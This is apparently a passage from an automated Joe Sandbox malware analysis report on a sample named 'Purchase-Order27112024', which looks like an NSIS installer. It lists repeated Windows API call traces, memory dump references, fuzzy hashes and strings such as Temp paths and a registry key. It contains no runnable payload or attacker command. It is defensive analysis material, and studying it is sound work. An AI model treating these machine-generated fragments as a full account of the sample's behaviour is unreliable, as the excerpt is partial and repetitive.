                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s$&B
                                                                                                      • API String ID: 3540041739-2907463167
                                                                                                      • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                                                                      • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                                                                      • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                                                                      • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeGlobal
                                                                                                      • String ID:
                                                                                                      • API String ID: 2979337801-0
                                                                                                      • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                      • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                      • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                      • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1148316912-0
                                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                      • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                      • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                      • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401D44
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808545654-0
                                                                                                      • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                                                                      • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                                                                      • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                                                                      • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                      • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: Call
                                                                                                      • API String ID: 3677997916-1824292864
                                                                                                      • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                      • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                                                                      • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                      • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00405999
                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059A3
                                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 2659869361-3936084776
                                                                                                      • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                      • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                                                                      • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                      • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                                                                      APIs
                                                                                                      • GlobalFree.KERNEL32(005AEA58), ref: 00401B92
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BA4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFree
                                                                                                      • String ID: Call$XZ
                                                                                                      • API String ID: 3394109436-416846113
                                                                                                      • Opcode ID: e0b4e13f50ba2418b6978e6b85f2920caab44446673b19aed4cb7ec32939bc14
                                                                                                      • Instruction ID: 564068f58b03e261203e6aa09dab7f6fb5d2f7f966de6333b684a5604785f160
                                                                                                      • Opcode Fuzzy Hash: e0b4e13f50ba2418b6978e6b85f2920caab44446673b19aed4cb7ec32939bc14
                                                                                                      • Instruction Fuzzy Hash: C02190B2610501ABCB10EBA4DD859AEB3B8EB45318B24443BF141B72D1D77CAC419F6D
                                                                                                      APIs
                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404258612-0
                                                                                                      • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                                                      • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                                                                      • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                                                      • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                                                                      APIs
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 3585118688-0
                                                                                                      • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                                                                      • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                                                                      • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                                                                      • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                                                                      • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 004056D6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
